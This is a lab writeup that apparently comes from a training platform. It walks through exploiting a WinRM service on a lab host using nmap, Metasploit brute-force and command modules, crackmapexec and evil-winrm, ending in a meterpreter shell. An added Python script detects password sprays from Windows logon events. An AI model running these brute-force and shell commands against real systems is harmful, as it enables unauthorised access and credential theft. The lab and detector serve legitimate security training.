WinRM: Exploitation with Metasploit

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Your task is to fingerprint the WinRM service using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework exploit and auxiliary modules.

Objective: Exploit the WinRM service to get a meterpreter on the target and retrieve the flag!

Tools

  • Metasploit Framework

  • Nmap

Writeup

nmap -sSVC demo.ine.local

Metasploit

msfconsole -q

Brute-force WinRM credentials with the bundled wordlists:

use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit

Enumerate the authentication methods the WinRM service accepts:

use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit

Run a single command with the recovered credentials:

use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit

Get a meterpreter session:

use exploit/windows/winrm/winrm_script_exec
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit

Alternative

crackmapexec winrm demo.ine.local -u /usr/share/wordlists/metasploit/common_users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"
evil-winrm -i demo.ine.local -u administrator -p tinkerbell
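From the defender's side, the wordlist login step above (winrm_login or crackmapexec) leaves a distinctive trace on the target: a burst of failed network logons (Security event ID 4625, Logon Type 3) from one source address, often followed by a success (4624) for one of the sprayed accounts. The script below is an added example, not part of the lab writeup or of Metasploit; it parses a constructed, simplified event format (timestamp, event ID, user, source, logon type) rather than real EVTX records, and the threshold and window values are assumptions a SOC would tune.

```python
"""Flag a WinRM-style password spray in simplified Windows Security events.

Added example (not from the lab writeup). The input format below is
constructed for illustration: "<ISO timestamp> <EventID> user=<name>
src=<ip> type=<logon type>". 4625 = failed logon, 4624 = successful logon,
logon type 3 = network logon, which is what WinRM (port 5985/5986) produces.
"""
from collections import defaultdict
from datetime import datetime, timedelta

THRESHOLD = 5                    # assumed: failures from one source that trigger an alert
WINDOW = timedelta(seconds=60)   # assumed: sliding window for counting failures

# Constructed sample events (not real log data): one spraying source that
# eventually succeeds, one user mistyping a password twice, one console logon.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 4625 user=admin src=10.10.1.5 type=3
2024-05-01T10:00:02 4625 user=guest src=10.10.1.5 type=3
2024-05-01T10:00:03 4625 user=administrator src=10.10.1.5 type=3
2024-05-01T10:00:04 4625 user=admin src=10.10.1.5 type=3
2024-05-01T10:00:05 4625 user=guest src=10.10.1.5 type=3
2024-05-01T10:00:06 4625 user=administrator src=10.10.1.5 type=3
2024-05-01T10:00:07 4624 user=administrator src=10.10.1.5 type=3
2024-05-01T10:05:00 4625 user=jsmith src=10.10.1.9 type=3
2024-05-01T10:05:30 4625 user=jsmith src=10.10.1.9 type=3
2024-05-01T10:06:00 4624 user=jsmith src=10.10.1.9 type=3
2024-05-01T10:07:00 4625 user=console src=10.10.1.9 type=2
"""


def parse_events(text):
    """Parse the simplified event lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, eid, *kv = line.split()
        fields = dict(part.split("=", 1) for part in kv)
        events.append({
            "ts": datetime.fromisoformat(ts),
            "id": int(eid),
            "user": fields["user"],
            "src": fields["src"],
            "type": int(fields["type"]),
        })
    return events


def detect_spray(events, threshold=THRESHOLD, window=WINDOW):
    """Return {source_ip: details} for sources with >= threshold network-logon
    failures inside any `window`, noting a later success from the same source."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["type"] != 3:          # only network logons matter for WinRM
            continue
        by_src[e["src"]].append(e)

    alerts = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        for i in range(len(failures)):
            # Advance j while failures[i..j) fit inside the window.
            j = i
            while j < len(failures) and failures[j]["ts"] - failures[i]["ts"] <= window:
                j += 1
            if j - i >= threshold:
                first_fail = failures[i]["ts"]
                later_success = [e for e in evs
                                 if e["id"] == 4624 and e["ts"] >= first_fail]
                alerts[src] = {
                    "failed_attempts": j - i,
                    "users_tried": sorted({e["user"] for e in failures[i:j]}),
                    "success_after": later_success[0]["user"] if later_success else None,
                }
                break                # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible spray from {src}: {info}")
```

Running it on the constructed sample reports only 10.10.1.5 (six failures across three accounts in six seconds, then a success for administrator); the two failures from 10.10.1.9 stay under the threshold and the type-2 console failure is ignored. Against real data the same logic would read 4625/4624 records from the Security log, and the auth-method enumeration shown above is the reminder that leaving Basic authentication enabled makes such sprays cheaper for the attacker than Kerberos or certificate authentication would.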
